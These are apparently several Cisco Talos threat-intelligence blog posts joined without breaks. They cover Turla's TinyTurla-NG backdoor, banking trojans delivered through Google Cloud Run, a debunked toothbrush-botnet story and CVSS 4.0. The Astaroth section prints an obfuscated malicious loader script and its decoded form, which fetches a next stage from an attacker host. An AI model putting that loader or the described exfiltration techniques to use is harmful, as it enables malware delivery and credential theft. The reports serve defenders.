In this campaign, Turla uses compromised WordPress-based websites as command and control endpoints (C2) for the TTNG backdoor. The operators used different websites running vulnerable WordPress versions (versions including 4.4.20, 5.0.21, 5.1.18 and 5.7.2), which allowed the upload of PHP files containing the C2 code consisting of names such as: rss-old[.]php, rss[.]old[.]php or block[.]old[.]php
TinyTurla-NG uses PowerShell and a command line to run arbitrary commands
During the campaign’s three-month run, different C2 servers were also used to host PowerShell scripts and arbitrary commands that could then be executed on the victim machine.
Like TinyTurla, the malware is a service DLL, which is started via svchost.exe. The malware code itself is different and new. Different malware features are distributed via different threads. The malware is using Windows events for synchronization. In the DLL’s ServiceMain function, the first main malware thread is started.
The InitCfgSetupCreateEvent function initializes the config variables and the event which is used for synchronization later on.
This thread then starts two more threads via the CheckOSVersion_StartWorkerThreads function.
After checking the PowerShell and Windows versions, the first thread starts to beacon to the C2 by sending a campaign identifier (“id”) and the message “Client Ready” to register the successful infection with the C2. This is done in the C2_client_ready function in the screenshot below.
If the registration is successful, the TTNG backdoor will ask the C2 for a task to execute (gettask_loop function). The second thread, which was started by the CheckOSVersion_Start_WorkerThreads function, is responsible for executing the task command sent from the C2. It waits until the TTNG backdoor has received the response from the C2. The synchronization between the two threads is performed via the Windows event mentioned earlier. The first thread triggers the event (in the thread1_function) once it has successfully received the task from the C2.
The tasks can be executed either using a PowerShell or command (cmd.exe) shell. The decision is made based on the PowerShell version running on the victim machine.
When executing commands via cmd.exe or PowerShell.exe, TinyTurla-NG will create pipes to input and read the output of the commands. While executing commands via cmd.exe, the backdoor first executes the command chcp 437 > NULexecute to set the active console page to 437, i.e., the U.S., and then execute the commands issued by the C2.
However, while executing commands via PowerShell.exe, TinyTurla-NG will additionally execute the following PowerShell cmdlet to prevent the recording of command history:
In addition to executing the content of the task received from the C2 directly e.g., C:\windows\system32\malware.exe, the backdoor will accept the following command codes from the C2. These command codes can be meant for administering the implant or for file management:
“timeout”: Change the number of minutes the backdoor sleeps between asking the C2 for new tasks. The new timeout is one minute multiplied by the timeout parameter sent by the C2. For example, if the C2 sends the task “timeout 10”, then the backdoor will now sleep for 10 minutes. If it is given a third parameter, the fail counter is changed, too.
“changeshell”: This command will instruct the backdoor to switch the current shell being used to execute commands, i.e., from cmd.exe to PowerShell.exe, or vice versa.
“changepoint”: This command code is used by the C2 to retrieve the result of command(s) executed on the infected endpoint. The endpoint will also return logging messages to the C2 server it has collected for administrative commands executed since "changepoint" was last issued such as:
[+] Short Timer changed. New Short Timeout is 1 minute
“get”: Fetch a file specified by the C2 using an HTTP GET request and write it to the specified location on disk.
“post”: Exfiltrate a file from the victim to the C2, e.g., post C:\some_file.bin.
“killme”: Create a BAT file (see below) with a name based on the current tick count. Then, use the BAT file to delete a file from the disk of the victim machine, e.g., killme <filename>. The BAT file is executed via cmd.exe /c <BAT-file-name>.bat.
The killme command generates a batch file with the content below. It is interesting to note that the backdoor DLL is essentially a service, however, the batch script deletes a registry key in HKCU\SW\classes\CLSID and restarts explorer[.]exe indicating an attempt to create persistence using COM hijacking, a tactic Turla has used in the past to establish persistence for their malware.
The BAT file is created from the template where the first two “%s” are replaced with the DLL name and the last one with the name of the BAT file itself to delete both artifacts from the disk.
TurlaPower-NG and its exfiltration capabilities
Talos also discovered malicious PowerShell scripts we’re calling “TurlaPower-NG”, written to infected endpoints via the TTNG backdoor. The scripts consist of the C2 URL and target file paths. For each file path specified, the script will recursively enumerate files and add them to an archive on disk. TurlaPower-NG takes specific care to exclude files with the “.mp4” extension from being added to the archive. The attackers had a specific interest in key material used to secure the password databases and popular password management software, adding related files to the archive:
The archive is a “.zip” extension whose name is generated on the fly by generating a new GUID which is used as the archive name. The archive file is then exfiltrated to the C2 using HTTP/S POST requests along with a log of the activity performed being sent to the C2 as well. The log consists of:
Name of the archive file (or part) POSTed to the C2.
Number of files in the archive along with the archive size.
C2 setup and operations
All of the C2 servers discovered so far consist of legitimate, vulnerable WordPress-based websites compromised by Turla to set up their C2 servers. Once compromised the operators set up scripts, logging and data directories to operate their C2 servers.
Directory and file structure
The C2’s directories and files setup consists of three key components:
C2 scripts: Turla set up PHP scripts ending with extensions — “.old.php” — in certain directories of the compromised websites. The URLs for these PHP-based C2s were then coded into the TTNG backdoors consisting of two C2 URLs per sample.
Logging: In addition to the C2 PHP scripts, the adversary also set up the logging of infections to keep track of infected systems and commands being issued to them. The logging mechanism of the C2 generates three log files on the C2 server:
_log[.]txt: A log of all infected endpoints beaconing into the C2.
result[.]txt: A log of all messages received from the TTNG backdoor.
tasks[.]txt: A log of all commands issued to the infected hosts.
Data directories: TTNG and TurlaPower-NG both support the exfiltration of files to the C2 server. The C2 server stores stolen data in directories separate from the logging directories.
C2 communication process
The TinyTurla-NG backdoor uses a specific Identifier, “id” value in its HTTP form data whenever it communicates with the C2 server. This ID value is an eight-character phrase hardcoded into the backdoor.
This same identifier value is then used to create directories for log files on the C2 server indicating that the C2 server maintains different log files for different identifiers.
After registering the victim on the C2 server, the backdoor sends out a gettask request, similar to the one below. The C2 can answer this with special commands or just the file that is supposed to be executed on the infected machine.
Depending on the PowerShell version running on the victim machine, the C2 task commands are piped into a PowerShell or cmd[.]exe shell.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
IOCs
IOCs for this research can also be found at our GitHub repository here.
I had a whole section on it written up in last week’s newsletter, and then I came across Graham Cluley’s blog post debunking the whole thing, and I had to delete it about an hour before the newsletter went live.
There was about a 24-hour period where many news outlets reported on a reported DDoS attack that involved a botnet made up of thousands of internet-connected toothbrushes, it all started with one international newspaper report, and then was aggregated to death and spread quickly on social media.
This attack was only a hypothetical that a security researcher posed in an interview but was reported or translated as an attack that happened.
To me, I think we can all learn from a few major takeaways from this entire saga — myself included.
It’s easy to see why this was a ready-made story to go viral: It involved a silly device that probably doesn’t need to be connected to the internet anyway, it involved a large number that would grab headlines and it was a DDoS attack, which have suddenly come back in vogue over the past year.
But, I’ll admit, the aggregated stories seemed a little fishy to me at first, because all the reports didn’t include any specifics about which company was targeted, how long the attack lasted, or the name of the device that was reportedly compromised.
That last part should be a red flag going forward for any of us wanting to share a meme about something the next time a cybersecurity story goes viral — in my opinion, responsible disclosure of an attack or compromise should always include information about whatever vulnerability it was that was exploited. In this hypothetical scenario, I don’t think an adversary would have been able to compromise an internet-connected toothbrush without first exploiting some sort of vulnerability, which if it’s being reported on in public, should at least include information on patches or mitigations.
I also think we all need to be asking the fundamental question: Why? In this case, I should have asked myself why an attacker would want to go through the trouble of compromising smart toothbrushes. And what would be the end goal of targeting a private company with a DDoS attack? Likely, it would be to demand a ransom in exchange for the attacker stopping the attack, but without knowing what sector the targeted company was in, it’s tough to guess how profitable that might even be. (For example, a health care agency may be looking to do anything to get back to operating asap, as lives could literally be at stake.)
And once the attacker compromised a toothbrush, what information can they glean from the user besides their dental hygiene habits? Usually, they’d be looking to steal some sort of personal information, login credentials or financial data that they could then turn around and sell on the dark web.
Needless to say, there were multiple red flags we all ignored when this story started to spread. And I’m not here to blame anyone in this case; it was all honest mistakes that, all things considered, ended up not being that serious. But the toothbrush botnet that wasn’t does serve as a reminder to all of us to be a bit more mindful before clicking share or posting a story on social media.
The one big thing
Cisco Talos has identified a new backdoor authored and operated by the Turla APT group, a Russian cyber espionage threat group. This new backdoor we’re calling “TinyTurla-NG” (TTNG) is similar to Turla’s previously disclosed implant, TinyTurla, in coding style and functionality implementation. Talos assesses with high confidence that TinyTurla-NG, just like TinyTurla, is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems.
Why do I care?
Turla has been widely known to target entities across the world using a huge set of offensive tools in geographies including the U.S., European Union, Ukraine and Asia. They’ve previously used malware families such as CAPIBAR and KAZUAR to target Ukrainian defense forces. After Crutch and TinyTurla, Turla has now expanded their arsenal to include the TinyTurla-NG and TurlaPower-NG malware families, while also widening its net of targets to NGOs.
So now what?
Talos has released new ClamAV signatures and Snort rules to protect against TinyTurla and the actors’ actions. We don’t know what the initial access vector is, so it’s tough to give targeted advice on how to avoid this malware, but having any endpoint detection in place will block this “last chance” backdoor.
Top security headlines of the week
Chinese state-sponsored actor Volt Typhoon may have silently sat on U.S. critical infrastructure networks for more than five years, according to a new report from American intelligence agencies. According to the advisory, the infamous hacking group has been exploiting vulnerabilities in routers, firewalls and VPNs to target water, transportation, energy and communications systems across the country. Volt Typhoon has been able to control some victims’ surveillance camera systems, and the access could have allowed them to disrupt critical energy and water controls. The actor is known for using living-off-the-land binaries (LoLBins) to remain undetected once they gain an initial foothold. Authorities in Canada, Australia and New Zealand also contributed to last week’s advisory, citing their concern for similar activity in their countries. The FBI’s director recently said in testimony to U.S. Congress that authorities had dismantled a bot network of hundreds of compromised devices that was connected to VoltTyphoon. (Axios, The Guardian)
A new spyware network called TheTruthSpy may have compromised hundreds of Android devices using silent tracking apps that users download thinking they’re legitimate. Security researchers uncovered the information of thousands of devices that have already been compromised, including their IMEI numbers and advertising IDs. TheTruthSpy appears to actively spy on large clusters of victims across Europe, India, Indonesia, the U.S. and U.K. The operators behind TheTruthSpy also did not address a security vulnerability in the software, identified as CVE-2022-0732, which left the victim data they stole potentially vulnerable to other bad actors. These types of stalkerware tools are often used by family members, spouses or peers of victims who want to track their physical locations and spy on messages and phone calls. The spyware is downloaded via an app, which doesn’t appear on the victim’s home screen and operates quietly in the background. (TechCrunch, maia blog)
Apple removed a fake LastPass app called “LassPass” after the popular password management service reported it. The phony LassPass used a similar logo to that of the legitimate LastPass and was up on the App Store for an unknown amount of time. Apple also said it was removing the creator of the app from its Developer Program. This is a very rare case for the Apple App Store, as it has a strict review policy. LastPass released a warning to all users last week of the fake app’s existence, including a link to the legitimate LastPass app. LassPass only had one review on the store, and multiple reviews warning it was fake. However, it’s safe to assume that the app was likely set up as some sort of phishing scam meant to get users to enter their legitimate LastPass login information to be stolen by the fake app’s creator. (Ars Technica, Bleeping Computer)
To protect themselves during Russian aggression, the Ukrainian military utilizes electronic warfare to blanket critical infrastructure to defeat radar and GPS-guided smart munitions. This has the unintended consequence of disrupting GPS synchrophasor clock measurements and creating service outages on an already beleaguered and damaged transmission electric grid. Joe Marshall from Talos’ Strategic Communications team will tell an incredible story of how a group of engineers and security professionals from a diverse coalition of organizations came together to solve this electronic warfare GPS problem in an unconventional technical way, and helped stabilize parts of the transmission grid of Ukraine.
Google Cloud Run is currently being abused in high-volume malware distribution campaigns, spreading several banking trojans such as Astaroth (aka Guildma), Mekotio and Ousaban to targets across Latin America and Europe.
The volume of emails associated with these campaigns has significantly increased since September 2023 and we continue to regularly observe new email distribution campaigns.
The infection chains associated with these malware families feature the use of malicious Microsoft Installers (MSIs) that function as droppers or downloaders for the final malware payload(s).
We have observed evidence that the distribution campaigns for these malware families are related, with Astaroth and Mekotio being distributed under the same Google Cloud Project and Google Cloud storage bucket. Ousaban is also being dropped as part of the Astaroth infection process.
Since September 2023, we have observed a significant increase in the volume of malicious emails leveraging the Google Cloud Run service to infect potential victims with banking trojans. Some of the highest volume campaigns recently observed were being used to deliver the Astaroth, Mekotio, and Ousaban banking trojans to victims largely located in Latin American countries. We have also observed lower volume campaign victims located throughout Europe and North America, which may indicate less geographically focused targeting by threat actors moving forward. The current variant of Astaroth targets more than 300 institutions across 15 Latin American countries.
Additionally, we have observed all three malware families being delivered during the same timeframe from the same storage bucket within Google Cloud. In the case of Ousaban, the payload was being delivered as part of the same Astaroth infection previously mentioned. This, combined with overlapping distribution TTPs, may indicate collaboration or links between the threat actors behind the distribution campaigns for the malware families, something that was previously referenced in a VirusBulletin paper.
What is Google Cloud Run?
Google Cloud Run is a service provided by Google that enables customers to build and deploy web services located in Google Cloud. They currently offer $300 in free credits for new Google accounts and two million free web requests per month.
When applications are deployed in Google Cloud Run, administrators are provided dashboards with detailed information about the requests being serviced by those web applications, performance metrics, load balancing configuration and graphs similar to what one would expect from the administrative panel for many Traffic Distribution Systems (TDS) commonly used by malware distributors. They also offer an Application Programming Interface (API) that allows for the rapid automated deployment of web services.
Based on these characteristics, adversaries may view Google Cloud Run as an inexpensive, yet effective way to deploy distribution infrastructure on platforms that most organizations likely do not prevent internal systems from accessing. It also enables the rapid rotation of new Google Cloud Run web applications as they are removed by the platform provider after users report them for abuse. Cisco Talos contacted Google to ensure that they were made aware of the activity recently observed across the threat landscape.
Email campaigns
While we have observed the use of Google Cloud Run URLs included in emails for quite some time, the vast majority of the total volume we have observed over the past 18 months has occurred since September 2023. Below is a volumetric representation of the total emails leveraging Google Cloud Run over the past 12 months.
The language distribution of the emails observed across these campaigns also demonstrates a strong focus on LATAM with the overwhelming majority of emails being sent in Spanish. Lower-volume activity also appears to be targeting Italian-speaking victims, as shown below.
We observed the majority of the systems sending these messages were located in Brazil.
In most cases, these emails are being sent using themes related to invoices or financial and tax documents, and sometimes pose as being sent from the local government tax agency in the country being targeted. In the example below, the email purports to be from Administración Federal de Ingresos Públicos (AFIP), the local government tax agency in Argentina, a country frequently targeted by recent malspam campaigns.
The emails contain hyperlinks to Google Cloud Run, which can be identified due to the use of run[.]app as the top-level domain (TLD).
When victims access these hyperlinks, they are redirected to the Cloud Run web services deployed by the threat actors and delivered the components necessary to initiate the infection process. As previously stated, we have observed Astaroth and Mekotio being distributed in this manner in the form of malicious Microsoft Installers (MSI) files as the Stage 1 payload to begin the infection process.
We’ve observed two recent variations in the way the MSI files are being delivered. In many cases, the MSI file is being delivered directly from the Google Cloud Run web service deployed by the adversary as shown in the case of Mekotio below.
In others, the Google Cloud Run web service responds with a 302 redirect to a file location within Google Cloud (hxxps[:]//storage[.]googleapis[.]com). The redirect results in the delivery of a ZIP archive containing a malicious MSI.
It is worth noting that attackers are deploying cloaking mechanisms to avoid detection. One of the cloaking approaches observed is using geoplugin. Some Google Cloud Run domains were redirected to a page for checking Proxy and Crawler and a threat level is given based on the information collected. Below is an example page observed upon redirection.
Notice: Undefined index: linkType in /var/www/html/62743bd3b3b3e/geoplugin.class.php on line 103
Notice: Undefined index: isCrawler in /var/www/html/62743bd3b3b3e/geoplugin.class.php on line 106
Notice: Undefined index: isProxy in /var/www/html/62743bd3b3b3e/geoplugin.class.php on line 107
Notice: Undefined index: threatLevel in /var/www/html/62743bd3b3b3e/geoplugin.class.php on line 108
The Google Cloud Run URLs observed in January 2024 did not show the above page but redirected to some legitimate websites. For example, one of the domains redirects to https://www.google.com/?hl=US when visiting with a U.S. IP address. We had also seen redirection toward other platforms including Microsoft Outlook, Wikipedia and X. We downloaded the payload by visiting the URLs with Brazilian IPs.
During our analysis, we observed cases where the same Google Cloud Storage Bucket was being used to deliver Mekotio and Astaroth payloads at the same time. We also observed Ousaban being delivered as part of a later stage of the same Astaroth infection chain. As this means that the same Google Cloud Project was being used to distribute both malware families, and based on the overlaps in distribution TTPs, we assess with moderate confidence that the distribution campaigns are linked to the same threat actor. Given the compartmentalization currently present across the crimeware landscape, is it difficult to assess whether the distribution campaigns are being conducted by the operator(s) of the final payloads themselves or if the same distribution service is being used.
An example of the final URLs delivering the malicious MSIs is shown below.
The diagram below shows the overlapping distribution process between Astaroth, Ousaban and Mekotio.
While we have previously covered Astaroth, we have observed changes in the infection process and operations of the final Astaroth payload as described below.
Astaroth
The initial MSI that is delivered to victims contains embedded JavaScript that has been placed into the CustomAction.idt file. It is obfuscated as shown below.
ExecuteScriptCode 37 var F636='\u0032\u0038\u0030\u002b\u0044\u0032\u0038\u0030\u002b\u0045\u0032\u0038\u0030\u002b\u0022\u002f\u002f\u0077\u0033\u0069\u0075\u0077\u006c\u002e\u006e\u0065\u0078\u0074\u006d\u0061\u0078\u002e\u006d\u0079\u002e\u0069\u0064\u002f\u003f\u0035\u002f\u0022\u0029\u003b' ; H8481='\u003a\u0068\u0022\u003b\u0045\u0032\u0038\u0030\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043' ; J45='\u0076\u0061\u0072\u0020\u0043\u0032\u0038\u0030\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0032\u0038\u0030\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022' ; K636=J45+H8481+F636; L8481=new Function(K636); L8481(); new ActiveXObject('WScript.Shell').run('cmd /V /C timeout 15>NUL&&exit',0,true);
When decoded, this is clearly responsible for reaching out to an attacker-controlled server to retrieve the next stage of the infection process.
var C280="s"+"cr";D280="ipt"+":h";E280="Tt"+"P:";GetObject(C280+D280+E280+"//w3iuwl[.]nextmax[.]my[.]id/?5/");
When the embedded JavaScript is executed, the malware retrieves an obfuscated JScript file from the next stage distribution server, as shown below.
Upon execution, the JScript first checks to determine if the next stages of the Astaroth infection have already been downloaded by checking the contents of the following filesystem locations.
If these locations are not present, the JScript invokes the Windows Command Processor to create a file containing the directory location that the malware will use to store various components retrieved during this stage of the infection process.
The JScript also contains a list of the URLs that will be used to download the next stage components. A variable set by the attacker is passed into a URL selection function to choose the URL to use for the retrieval process. An example of this is shown below.
At the time of analysis, all of the distribution URLs were being hosted on the same system (34[.]135[.]1[.]100). This IP address was also located within the Google Cloud environment during analysis.
The malware then uses the Bitsadmin living-off-the-land binary (LoLBin) to retrieve the next-stage components from the aforementioned distribution server. First, it retrieves the legitimate executable associated with AutoIt3.exe which will be used to execute a compiled AutoIt script later in the infection process.
The malware then executes the compiled AutoIt script to initiate the next stage of the infection process using the previously retrieved AutoIt3.exe binary.
The compiled AutoIt script is a DLL loader modified from a tutorial shared on the AutoIT community forum. The attacker obfuscated the name of some arguments like the function name in the script. The script contains an embedded hexadecimal blob that represents a DLL that functions as a loader for the final Astaroth payload. The payload itself is saved to the same folder above using the name “sdk.log” and as the Ousaban payload, it is also encoded with an XOR key (Key: 0x2A).
Before the AutoIT script loads the embedded Astaroth loader, it checks if a file named RQJXogtisgyqqgTDKCGZoswknstidwandXLTBsqwgwhtoutwwandyideshuAYU before loading. It could potentially be a killswitch to stop the loader.
The loader DLL reads the “sdk.log” file from the disk and decodes it, starts the process “regsvcs.exe” and injects the final Astaroth payload into this process in memory. Most of the functionality and malware operation in this variant was consistent with our prior reporting here. However, the following notable changes were observed during our analysis.
We observed the ability to steal a variety of cryptocurrency and bitcoin exchange credentials besides the usual banks they target. The following coins or exchanges are targeted by this variant:
Astaroth also implements code to monitor the foreground window for the presence of popular browsers. Once one is identified, it will check the window title to see if one of the banks in its monitoring list is open.
If a target bank is open, the malware is capable of logging keystrokes and taking screenshots of the screen around the mouse pointer when the user clicks on the screen. That is done to capture the clicks on virtual keyboards used by many Latin American banks as a security measure against keyloggers.
The malware is also configurable for the countries as well as the financial institutions it is targeting. The current variant targets more than 300 institutions across 15 Latin American countries.
The payload communicates with C2 using Ngrok (1[.]tcp[.]sa[.]ngrok[.]io) over TCP/26885. At the time of our analysis, this server accepted connections but did not respond in return.
Finally, the malware establishes persistence using a LNK file in the Startup menu. The LNK file named “sysupdates.setup<random_string>.lnk” will use PowerShell to execute the original AutoIT binary, passing the AutoIT compiled script as a parameter. It also creates the list of folders below and drops encrypted files to these folders during the time it is running in memory.
C:\Users\Public\Libraries\fa
C:\Users\Public\Libraries\fb
C:\Users\Public\Libraries\fc
C:\Users\Public\Libraries\fd
C:\Users\Public\Libraries\d
C:\Users\Public\Libraries\e
C:\Users\Public\Libraries\f
C:\Users\Public\Libraries\db
C:\Users\Public\Libraries\db\H1
C:\Users\Public\Libraries\auid.log
C:\Users\Public\Libraries\ax.mod
C:\Users\Public\Libraries\git2.tmp
C:\Users\Public\Libraries\logx1
C:\Users\Public\Libraries\logx2
C:\Users\Public\Libraries\logx3
C:\Users\Public\Libraries\logx4
C:\Users\Public\Libraries\logx5
Inside the folder “C:\Users\Public\Libraries\db”, the malware also creates files with the screen captures taken from the target bank pages, compressed with Zlib. These screen capture files are named according to the machine name and drive serial number, as the example “desktopddk19bk.1e41f1721.byte”.
This folder also contains files named sequentially starting from “B1”, “B2”, “B3” and so on, according to the screen capture files. They are also compressed with Zlib and encrypted, which we believe is done before sending the files to the C2. As we could not receive an initial response from the C2, we cannot confirm this.
Mekotio
Mekotio is another banking trojan that has historically targeted Latin American victims, exfiltrating sensitive financial information from infected systems. In the case of Mekotio, unlike Astaroth, which embeds JavaScript into the MSI, the MSIs contain malicious DLL files that are included as binary streams within the installer file itself. They also include a CAB file that contains two DLL dependencies and a text file.
When the MSI is executed, the contents of the CAB file are extracted to %PROGRAMDATA%. The CAB file contents include:
libeay32.dll
ssleay32.dll
l.txt (written to %PROGRAMDATA% as 8.txt)
The DLL is then executed by calling the appropriate exported function.
The final payload is written in Delphi and packed using VMProtect to make analysis more difficult.
The malware then reaches out to the ipinfo IP geolocation service to determine the location of the infected system before proceeding. The sample uses geolocation-based filtering to prevent the infection of systems not located within specific geographic regions.
In the sample analyzed, C2 communications were performed via TLS over TCP/8088 however at the time of analysis the C2 server was not responding to requests. In other samples analyzed over the same timeframe, we observed the TCP port used for C2 changing across samples.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
The following Snort SIDs are applicable to this threat: 63014 - 63017, 300827.
The following ClamAV signatures have been released to detect malware artifacts related to this threat:
Win.Malware.Astaroth-10020745-0
Win.Malware.Astaroth-10020746-0
Win.Malware.Astaroth-10020747-0
Win.Malware.Ousaban-10020887-0
Win.Malware.Astaroth-10021009-0
Win.Packed.Mekotio-10020648-0
Indicators of Compromise
IOCs for this research can also be found at our Github repository here
Hashes (SHA256)
The following SHA256 have been observed associated with these malware campaigns.
Finding, managing and patching security vulnerabilities on any network, no matter the size, is a tall task.
In the first week of 2024 alone, there were 621 new common IT security vulnerabilities and exposures (CVEs) disclosed worldwide, covering a range of applications, software and hardware that could be on any given network.
Just looking at the raw number of security vulnerabilities that need to be mitigated or patched is going to be overwhelming for any IT team. So, at its most basic level, it’s easy to see why administrators and security researchers are drawn to the appeal of a singular data point that measures how severe a vulnerability is, distilled down to a scale of 0 – 10.
Most casual cybersecurity observers will be familiar with the basic terms like “critical,” “severe” or “moderate” when it comes to measuring how serious a particular vulnerability is – these are usually used in news articles or technical write-ups about a security issue when it becomes public and is based on a vulnerability’s CVSS score.
Now, the way those vulnerabilities are scored is changing, and many organizations are likely to adopt the newly created CVSS 4.0 this year with the hope of providing new context around how, exactly, vulnerabilities can be exploited and what type of risk they present to targets.
CVSS was created and is managed by the Forum of Incident Response and Security Teams (FIRST), a non-profit organization made up of incident response teams from government organizations and private companies.
FIRST describes the CVSS scoring system as “a way to capture the principal characteristics of a vulnerability and produce a numerical score reflecting its severity. The numerical score can then be translated into a qualitative representation (such as low, medium, high, and critical) to help organizations properly assess and prioritize their vulnerability management processes.”
And while distilling risk down to a simple numerical score is helpful for many in the security space, it is also an imperfect system that can often leave out important context and does not paint the whole picture of how to best manage vulnerable systems on a network.
What’s new in CVSS 4.0?
CVSS 3.1, the current model used by many organizations to measure vulnerability severity, has been around for about four years now. With CVSS 4.0, the creators are hoping to add additional context around how an attacker could exploit a certain vulnerability and what specific requirements need to be met before an adversary could carry out the exploit.
Jerry Gamblin, a principal threat detection and response engineer for Cisco Vulnerability Management, said in a recent episode of Talos Takes that the main takeaway for users who just want to focus on the severity score (and whether an issue is particularly critical) will be in a new “attack requirements” field for scoring a vulnerability. Vulnerabilities that require a targeted software be configured in a certain way outside of its default state to be vulnerable are likely to have lower severity scores under CVSS 4.0, according to Gamblin.
FIRST also says that CVSS 4.0 offers “finer granularity through the addition of new base metrics and values,” including providing readers and administrators with new information about what attack requirements exist for an adversary to be successful, and whether user interaction is required or not for a vulnerability to be exploited.
The formula also includes a greater focus on resiliency on the internet-of-things and industrial control systems space, which has become a great focus of the cybersecurity community.
Once CVSS 4.0 is out in the wild for long enough, FIRST is also likely to release an update in 4.1 that will fix any inconsistencies discovered during the rollout or to add additional missing context, though there is no concrete timeline for when that will happen.
CVSS 4.0 won’t start appearing on most vulnerability advisories users are used to reading until later this year, when organizations that handle the release and disclosure of vulnerabilities start adopting CVSS 4.0, like the National Vulnerability Database, which won’t happen until later this year.
Yves Younan, the leader of Talos’ Vulnerability Research Team, which discovers and discloses hundreds of new vulnerabilities every year, said it could be a year or more before Talos vulnerability advisories start using CVSS 4.0 as any problems are addressed. Talos also did not initially adopt CVSS 3.0 when it was released five years ago.
What does a severity score mean, anyway?
Generally, a higher CVSS score means a vulnerability is more serious than others and should be addressed sooner than others with lower severity scores.
For example, Log4shell (CVE-2021-44228), a critical remote code execution vulnerability in the popular Apache Foundation Log4j library, was assigned a maximum score of 10 out of 10 in December 2021 when it was first discovered. The infamous vulnerability was widely exploited across the globe and continues to still be an issue today.
While this score seems objective in measuring how serious an issue is, a CVSS score can be influenced by the researcher reporting the vulnerability and the vendor that needs to patch the issue.
Talos uses the CVSS calculator to create its own severity scores, according to Younan. Eventually, Talos waits for MITRE Corp. to assign a CVE and communicates with the affected vendor about releasing a patch. However, certain aspects of how the CVSS is calculated can be subjective to the organization scoring it, such as whether they consider a vulnerability particularly “easy” or “difficult” to exploit. One major advantage of CVSS 4.0 is that this determination has a much lower impact on the score compared to CVSS 3.1 where it would cause a significant change in the score.
That end score that makes it out into the public is particularly important, though, because a security issue being covered in the press or spread widely on social media can often lead to more attackers trying to exploit the issue on unpatched software or hardware, and therefore increased urgency for the need to patch the issue from admins.
The severity score on one individual vulnerability doesn’t tell the whole story about a potential exploit, either. Younan said many attacks and breaches are the result of adversaries chaining multiple vulnerabilities together to target a particular product or service. As Talos highlights in many of its Vulnerability Deep Dive posts, attackers can use a series of vulnerabilities with relatively low severity scores to eventually carry out a more serious attack or even completely take over a system.
How do severity scores affect vulnerability management?
Though severity scores are what will eventually make headlines, patching cadence and vulnerability management must take several factors into consideration.
Each organization will have its own approach for how to address patching and updating their systems with their individual needs, Gamblin said, meaning it’s not as simple as patching 10-out-of-10 severity vulnerabilities first, then 9.9 out of 10, etc.
Certain technologies, such as Cisco Vulnerability Management, can help administrators prioritize patching on their systems and see what vulnerabilities their networks are exposed to. Cisco Vulnerability Management has its own risk score that it uses to prioritize patching, and while the base CVSS score is a part of that calculation, Gamblin said the Cisco Risk Score won’t change because of the release of CVSS 4.0.
Gamblin urges all users and administrators to first patch for vulnerabilities in any software or hardware that’s directly exposed to the internet first, without consideration for whether the vulnerability received a “critical” score or not.
“Anything exposed to the internet should be patched because that’s where we see most attacks,” he said in the Talos Takes episode. “There are very few physical or local attacks these days.”
After that, patching should focus on specific vulnerabilities that could lead to remote code execution, because those are the issues attackers are most likely to exploit, he said. While remote code execution vulnerabilities do generally receive higher severity scores, this isn’t always the case.
It’s also important to prioritize patching any systems that customers or employees access on a day-to-day basis at an organization, Gamblin said, such as email clients or any software that employees have dedicated credentials to and stores sensitive information.
As we pointed out in the 2023 Year in Review report, network infrastructure is also being targeted more frequently, so it’s important to patch any edge devices that touch the internet like routers and switches.
For more on this topic, listen to a previous Talos Takes episode on patching strategies below, and read our recent post on securing network infrastructure.
Cisco Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT. New findings from Talos illustrate the inner workings of the command and control (C2) scripts deployed on the compromised WordPress servers utilized in the compromise we previously disclosed.
Talos also illustrates the post-compromise activity carried out by the operators of the TinyTurla-NG (TTNG) backdoor to issue commands to the infected endpoints. We found three distinct sets of PowerShell commands issued to TTNG to enumerate, stage and exfiltrate files that the attackers found to be of interest.
Talos has also discovered the use of another three malicious modules deployed via the initial implant, TinyTurla-NG, to maintain access, and carry out arbitrary command execution and credential harvesting.
One of these components is a modified agent/client from Chisel, an open-sourced attack framework, used to communicate with a separate C2 server to execute arbitrary commands on the infected systems.
Certificate analysis of the Chisel client used in this campaign indicates that another modified chisel implant has likely been created that uses a similar yet distinct certificate. This assessment is in line with Turla’s usage of multiple variants of malware families including TinyTurla-NG, TurlaPower-NG and other PowerShell-based scripts during this campaign.
